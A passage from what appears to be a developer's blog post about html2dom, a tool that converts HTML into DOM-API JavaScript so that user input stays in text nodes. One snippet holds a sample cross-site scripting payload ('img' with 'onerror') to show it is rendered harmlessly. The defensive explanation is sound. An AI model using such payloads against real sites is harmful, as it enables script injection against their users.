greeting.appendChild(text);
var b = document.createElement('B');
greeting.appendChild(b);
var text_0 = document.createTextNode("World");
b.appendChild(text_0);

As you can see, html2dom tries to use meaningful variable names to make the code readable. If you want, you can try the demo here. Now we could also just replace the "World" string with a JavaScript variable. It cannot do any harm as it is always rendered as text.
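For instance, feeding untrusted input through the generated code stays harmless, because createTextNode never interprets markup (continuing the generated snippet above with a hypothetical attacker-controlled value):

var userInput = '<img src=x onerror=alert(1)>'; // hypothetical attacker-controlled value
var text_0 = document.createTextNode(userInput); // rendered literally, never executed
b.appendChild(text_0);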

When it comes to HTML parsers, you also don’t want to write your own.

Luckily, there are numerous very useful APIs that helped make the development of html2dom fairly easy. First, there is the DOMParser API, which took care of all the HTML parsing. Using the DOM tree output, I could just iterate over all nodes and their children to emit a specific piece of JavaScript depending on each node’s type (e.g., element or text). For this, the NodeIterator turned out really valuable.
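A rough sketch of that approach, using the same example markup as above (not html2dom’s actual code):

var doc = new DOMParser().parseFromString('<p id="greeting">Hello <b>World</b></p>', 'text/html');
var iterator = document.createNodeIterator(doc.body, NodeFilter.SHOW_ELEMENT | NodeFilter.SHOW_TEXT);
var node;
while ((node = iterator.nextNode())) {
  if (node.nodeType === Node.TEXT_NODE) {
    console.log('document.createTextNode(' + JSON.stringify(node.data) + ');');
  } else if (node !== doc.body) {
    console.log("document.createElement('" + node.nodeName + "');");
  }
}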

I have also written a few unit tests, so if you want to start messing with my code, I suggest you start by checking them out right away.

Known Bugs & Security

This tool doesn’t really save you from all of your troubles. But if you can make sure that the user input always ends up in a text node, html2dom can protect you from a great deal of harm. Give it a try!

On the horizon

I have also been looking at attempts to rewrite potentially dangerous JavaScript automatically. This is at an early stage and still experimental, but you can look at a prototype here.